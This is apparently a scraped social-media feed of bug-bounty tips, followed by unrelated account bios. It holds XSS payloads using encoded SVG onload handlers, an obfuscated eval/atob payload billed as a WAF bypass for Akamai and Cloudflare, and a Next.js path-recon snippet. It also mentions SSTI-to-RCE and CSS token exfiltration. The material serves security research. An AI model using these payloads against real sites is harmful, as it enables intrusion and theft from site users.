Nice one with HTML entities and double encoding by @BRuteLogic
<Svg/OnLoad=alert%25%0A26lpar;1)>
with some more encoding:
\%0A74Svg/On%0ALoad=alert%25%0A26lpar;1%25%0A26rpar;>
🚨 SSTI → RCE → Reverse shell on. Jinja2 template injection in the Title field allowed arbitrary command execution (whoami: web). More details, PoC, and mitigations are available on our WhatsApp channel.
whatsapp.com/channel/0029Vb…#BugBounty#SSTI#RCE
I received an email from a reader asking if I could explain the payload of the "XSS without () and ;"
here is it
I am not the one who invent it, just someone trying to explain every details of it. Based on it, we can also make it worked in both browsers
blog.huli.tw/2025/09/15/en/…
Use NextJS? Recon Tip by renniepak
A quick way to find "all" paths for Next.js websites:
DevTools->Console
console.log(__BUILD_MANIFEST.sortedPages)
javascript:console.log(__BUILD_MANIFEST.sortedPages.join('\n'));
#infosec#cybersec#bugbountytips
I just found a WAF bypass for Akamai and Cloudflare:
<address onscrollsnapchange=window['ev'+'a'+(['l','b','c'][0])](window['a'+'to'+(['b','c','d'][0])]('YWxlcnQob3JpZ2luKQ==')); style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1337</div></address>
Typical CSS injection often relies on repeated context loading (usually via iframes) to exfiltrate sensitive tokens.
I found this tool by @ixSly that's both fast and works in Chrome and Safari. It can leak tokens with just a single CSS import by leveraging -webkit-cross-fade 🤯…
Path traversal opens doors to secrets, source code and even RCE when chained with other exploits 📂 Level up your #BugBounty hunting skills with our practical guide to path traversal and arbitrary file read attacks 👇
yeswehack.com/learn-bug-boun…
Just released a new recollapse version thanks to @ryancbarnett and @4ng3lhacker after their talk in @BlackHatEvents today.
What’s new?
💥Mode 6: Fuzz case folding/upper/lower
💥 Mode 7: Fuzz byte truncations
💥 Recollapse is now available to use as a python library and…
5K Followers 4K FollowingWelcome to the unofficial OpenDocument Format channel on Twitter. General information in English, Spanish or Portuguese. News, tips, tricks, apps and more!
261 Followers 3K FollowingUnbelievable coupon savings and shopping deals for your favorite blackhat software, services, and more - fresh new coupons always at your fingertips!
1K Followers 2K FollowingFixated with marketing my online business, blogging and learning. Will only follow people I think I can learn from and perhaps JV with.
811 Followers 920 FollowingSr. Malware Research Mgr @ GoDaddy / Sucuri Inc. | Web Malware Analysis | Reverse Eng | Passionate about protecting the Web | Tweets and Thoughts are my own
10K Followers 0 FollowingAssetnote combines advanced reconnaissance and high-signal continuous security analysis to help enterprises gain insight and control of their evolving exposure.
18K Followers 222 FollowingAnda boleh melakukan segala-galanya dari syurga ke bumi, wanita kecil!!
If you have any questions, please contact me
https://t.co/MkzsavUU9V
12K Followers 530 Followingi'm good at all kinds of computer. i love my wife and my wife. i miaow. i'm an ARAR unit. i sell flippers at @flipper_zero, but opinions are my own. 🐈❤️🐈⬛
96K Followers 2K FollowingHacker, marketer. I manage socials and produce amazing technical blogs for cybersecurity orgs. Founder of @hacker_content and @haksecio
483 Followers 92 FollowingTechnology enthusiast and mobile security researcher experienced in pentesting of mobile apps. Reach out at [email protected] for technical consultation.
1K Followers 1 Followingjswzl helps make web application testing easier with static analysis, making it easier to audit JS code and do your recon/mapping
48K Followers 452 FollowingSecurity researcher with a focus on hardware & firmware. I occasionally publish stuff on YouTube. Co-founder of @hextreeio. Contact: [email protected]